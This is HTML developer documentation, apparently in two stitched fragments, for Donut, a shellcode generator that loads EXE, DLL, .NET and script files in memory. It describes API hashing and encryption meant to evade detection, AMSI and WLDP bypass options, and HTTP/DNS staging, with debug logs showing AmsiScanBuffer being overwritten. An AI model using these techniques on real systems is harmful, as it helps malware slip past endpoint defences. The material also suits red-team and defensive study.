268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
277 <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
0
1 <html>
2 <head>
3 <meta charset="utf-8">
4 </head>
5 <body>
6
7 <h2>Table of contents</h2>
8
9 <ol>
10 <li><a href="#intro">Introduction</a></li>
11 <li><a href="#api">Donut API</a></li>
12 <li><a href="#config">Donut Configuration</a></li>
13 <li><a href="#static">Static Example</a></li>
14 <li><a href="#dynamic">Dynamic Example</a></li>
15 <li><a href="#com">Donut Components</a></li>
16 <li><a href="#instance">Donut Instance</a></li>
17 <li><a href="#module">Donut Module</a></li>
18 <li><a href="#hashing">Win32 API Hashing</a></li>
19 <li><a href="#encryption">Symmetric Encryption</a></li>
20 <li><a href="#bypass">Bypasses for AMSI/WLDP</a></li>
21 <li><a href="#debug">Debugging The Generator and Loader</a></li>
22 <li><a href="#loader">Extending The Loader</a></li>
23 </ol>
24
25 <h2 id="intro">1. Introduction</h2>
26
27 <p>This document contains information useful to developers that want to integrate Donut into their own project or write their own generator in a different language. Static and dynamic examples in C are provided for Windows and Linux. There's also information about the internals of the generator and loader such as data structures, the hash algorithm for resolving API, how bypassing AMSI and WLDP works, the symmetric encryption, debugging the generator and loader. Finally, there's also some information on how to extend functionality of the loader itself.</p>
28
29 <h2 id="api">2. Donut API</h2>
30
31 <p>Shared/dynamic and static libraries for both Windows and Linux provide access to three API.</p>
32
33 <ol>
34
35 <li><code>int DonutCreate(PDONUT_CONFIG)</code></li>
36 <p>Builds the Donut shellcode/loader using settings stored in a <code>DONUT_CONFIG</code> structure.</p>
37
38 <li><code>int DonutDelete(PDONUT_CONFIG)</code></li>
39 <p>Releases any resources allocated by a successful call to <code>DonutCreate</code>.</p>
40
41 <li><code>const char* DonutError(int error)</code></li>
42 <p>Returns a description for an error code returned by <code>DonutCreate</code>.</p>
43
44 </ol>
45
46 <p>The Donut project already contains a generator in C. <a href="https://twitter.com/nixbyte">nixbyte</a> has written <a href="https://github.com/n1xbyte/donutCS">a generator in C#</a>. awgh has written <a href="https://github.com/Binject/go-donut/">a generator in Go</a> and <a href="https://twitter.com/byt3bl33d3r">byt3bl33d3r</a> has written a Python module already included with the source.</p>
47
48 <h2 id="config">3. Donut Configuration</h2>
49
50 <p>The minimum configuration required to build the loader is a path to a VBS/JS/EXE/DLL file that will be executed in-memory. If the file is a .NET DLL, a class and method are required. If the module will be stored on a HTTP server, a URL is required. The following structure is declared in donut.h and should be zero initialized prior to setting any member.</p>
51
52 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
53 uint32_t len<span style='color:#808030; '>,</span> zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original length of input file and compressed length</span>
54 <span style='color:#696969; '>// general / misc options for loader</span>
55 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture</span>
56 <span style='color:#800000; font-weight:bold; '>int</span> bypass<span style='color:#800080; '>;</span> <span style='color:#696969; '>// bypass option for AMSI/WDLP</span>
57 <span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine to use when compressing file via RtlCompressBuffer</span>
58 <span style='color:#800000; font-weight:bold; '>int</span> entropy<span style='color:#800080; '>;</span> <span style='color:#696969; '>// entropy/encryption level</span>
59 <span style='color:#800000; font-weight:bold; '>int</span> format<span style='color:#800080; '>;</span> <span style='color:#696969; '>// output format for loader</span>
60 <span style='color:#800000; font-weight:bold; '>int</span> exit_opt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// return to caller or invoke RtlExitUserProcess to terminate the host process</span>
61 <span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API</span>
62 uint64_t oep<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original entrypoint of target host file</span>
63
64 <span style='color:#696969; '>// files in/out</span>
65 <span style='color:#800000; font-weight:bold; '>char</span> input<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of input file to read and load in-memory</span>
66 <span style='color:#800000; font-weight:bold; '>char</span> output<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of output file to save loader</span>
67
68 <span style='color:#696969; '>// .NET stuff</span>
69 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use for CLR</span>
70 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for .NET DLL/EXE</span>
71 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class with optional namespace for .NET DLL</span>
72 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method or DLL function to invoke for .NET DLL and unmanaged DLL</span>
73
74 <span style='color:#696969; '>// command line for DLL/EXE</span>
75 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line to use for unmanaged DLL/EXE and .NET DLL/EXE</span>
76 <span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// param is passed to DLL function without converting to unicode</span>
77
78 <span style='color:#696969; '>// HTTP/DNS staging information</span>
79 <span style='color:#800000; font-weight:bold; '>char</span> server<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be stored on remote HTTP server or DNS server</span>
80 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk for http stager</span>
81
82 <span style='color:#696969; '>// DONUT_MODULE</span>
83 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// VBS/JS/DLL/EXE</span>
84 <span style='color:#800000; font-weight:bold; '>int</span> mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
85 DONUT_MODULE <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_MODULE</span>
86
87 <span style='color:#696969; '>// DONUT_INSTANCE</span>
88 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_EMBED or DONUT_INSTANCE_HTTP</span>
89 <span style='color:#800000; font-weight:bold; '>int</span> inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
90 DONUT_INSTANCE <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_INSTANCE</span>
91
92 <span style='color:#696969; '>// shellcode generated from configuration</span>
93 <span style='color:#800000; font-weight:bold; '>int</span> pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of loader/shellcode</span>
94 <span style='color:#800000; font-weight:bold; '>void</span><span style='color:#808030; '>*</span> pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to loader/shellcode</span>
95 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
96 </pre>
97
98 <p>The following table provides a description of each member.</p>
99
100 <table border="1">
101 <tr>
102 <th>Member</th>
103 <th>Description</th>
104 </tr>
105 <tr>
106 <td><code>len, zlen</code></td>
107 <td><var>len</var> holds the length of the file to execute in-memory. If compression is used, <var>zlen</var> will hold the length of file compressed.</td>
108 </tr>
109 <tr>
110 <td><code>arch</code></td>
111 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
112 </tr>
113 <tr>
114 <td><code>bypass</code></td>
115 <td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are <code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. <code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. <code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
116 </tr>
117 <tr>
118 <td><code>compress</code></td>
119 <td>Indicates if the input file should be compressed. Available engines are <code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports <code>DONUT_COMPRESS_LZNT1</code>, <code>DONUT_COMPRESS_XPRESS</code> and <code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
120 </tr>
121 <tr>
122 <td><code>entropy</code></td>
123 <td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are <code>DONUT_ENTROPY_NONE</code>, <code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and <code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
124 </tr>
125 <tr>
126 <td><code>format</code></td>
127 <td>Specifies the output format for the shellcode loader. Supported formats are <code>DONUT_FORMAT_BINARY</code>, <code>DONUT_FORMAT_BASE64</code>, <code>DONUT_FORMAT_RUBY</code>, <code>DONUT_FORMAT_C</code>, <code>DONUT_FORMAT_PYTHON</code>, <code>DONUT_FORMAT_POWERSHELL</code>, <code>DONUT_FORMAT_CSHARP</code> and <code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
128 </tr>
129 <tr>
130 <td><code>exit_opt</code></td>
